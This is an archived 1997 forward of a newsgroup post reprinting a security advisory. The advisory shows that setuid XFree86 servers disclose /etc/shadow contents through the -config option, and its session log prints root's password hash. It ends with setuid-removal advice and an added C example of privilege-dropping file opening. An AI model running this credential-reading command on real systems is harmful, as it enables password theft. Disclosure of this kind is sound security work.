(fwd) XFree spy

Andrey Gerzhov (kittle@freeland.alex-ua.com)
Sat, 29 Nov 1997 23:49:15 +0200 (EET)

-- forwarded message --
Path: freeland.alex-ua.com!barmaglot.alex-ua.com!f188.n463.z2!f116.n463.z2!f58.n463!f238.n5020!f443.n5020!f509.n5020!f215.n5020!f23.n5030!f48.n5030!not-for-mail
Newsgroups: fido.ru.nethack
Distribution: fido
X-Comment-To: All
From: Ricky Lyte <Ricky.Lyte@p58.f48.n5030.z2.fidonet.org>
Date: Fri, 28 Nov 97 15:41:03 +0200
Subject: XFree spy
Message-ID: <880731754@p58.f48.n5030.z2.ftn>
Organization: Welcome to the world of Emotional Degradation!
X-FTN-AREA: RU.NETHACK
X-FTN-MSGID: 2:5030/48.58 347ee66a
X-FTN-PID: GED B0116 2000OS3
X-FTN-TID: GE 1.11+
X-FTN-Tearline: 1984!
X-FTN-Origin: Welcome to the world of Emotional Degradation! (2:5030/48.58)
Lines: 81
Xref: freeland.alex-ua.com fido.ru.nethack:496

And what about reading files you have no access to? Here's a hint!

plaguez security advisory n.10

XFree86 insecurity

Program: XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)

Version: Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
Other versions as well.

OS: All

Impact: The XFree86 servers let you specify an alternate configuration
file and do not check whether you have rights to read it.
Any user can read files with root permissions.

hello,
just a short one to tell you about this "feature" I found in all default
XFree86 servers...

Here it is:

Script started on Sat Aug 23 15:32:36 1997
Loading /usr/lib/kbd/keytables/fr-latin1.map
[plaguez@plaguez plaguez]$ uname -a
Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
[plaguez@plaguez plaguez]$ ls -al /etc/shadow
-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
[plaguez@plaguez bin]$ id
uid=502(plaguez) gid=500(users) groups=500(users)
[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:<display>] [option]
-a # mouse acceleration (pixels)
-ac disable access control restrictions
-audit int set audit trail level
-auth file select authorization file
bc enable bug compatibility
-bs disable any backing store support
-c turns off key-click

... and so on. HINT: look at the first XF86_SVGA output line.

Patch:
------

If you run xdm, you should consider removing the setuid bit of the
servers.

If not, well, wait for the XFree86 Project to bring you a patch, since I'm
too lazy to find and fix it.

later,

-plaguez
dube0866@eurobretagne.fr

-----------------

Team Porno-Grafica

-- end of forwarded message --

-- 

Kittle
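
The advisory's root cause is a setuid-root server opening the `-config` path with root's rights instead of the invoking user's. The C code below is an added example, not part of the forwarded advisory and not XFree86 code; it shows one way a setuid program can open a user-supplied file with the caller's own rights. `open_config_as` and the default file name are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Added illustration, not XFree86 code. open_config_as() is a hypothetical
 * helper: it opens `path` read-only with the rights of (uid, gid) instead of
 * the setuid effective identity. Returns an fd, or -1 with errno set. */
int open_config_as(const char *path, uid_t uid, gid_t gid)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    /* Change the group while still privileged, then the user. */
    if (setegid(gid) != 0)
        return -1;
    if (seteuid(uid) != 0) {
        saved_errno = errno;
        if (setegid(saved_egid) != 0)
            _exit(1);
        errno = saved_errno;
        return -1;
    }
    /* The kernel checks permissions inside open() itself, so there is no
     * check-then-open race as there would be with access() + open(). */
    fd = open(path, O_RDONLY | O_NOCTTY);
    saved_errno = errno;

    /* Regain the original identity; a failure here must be fatal. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        _exit(1);
    errno = saved_errno;
    return fd;
}

int main(int argc, char **argv)
{
    int fd = open_config_as(argc > 1 ? argv[1] : "XF86Config", getuid(), getgid());
    if (fd < 0) {
        fprintf(stderr, "config refused: %s\n", strerror(errno));
        return 1;
    }
    close(fd);
    return 0;
}
```

Installed setuid root and run by an ordinary user against a mode 0600 root-owned file, the `open()` fails with EACCES before any byte is read, so nothing from the file can reach an error message.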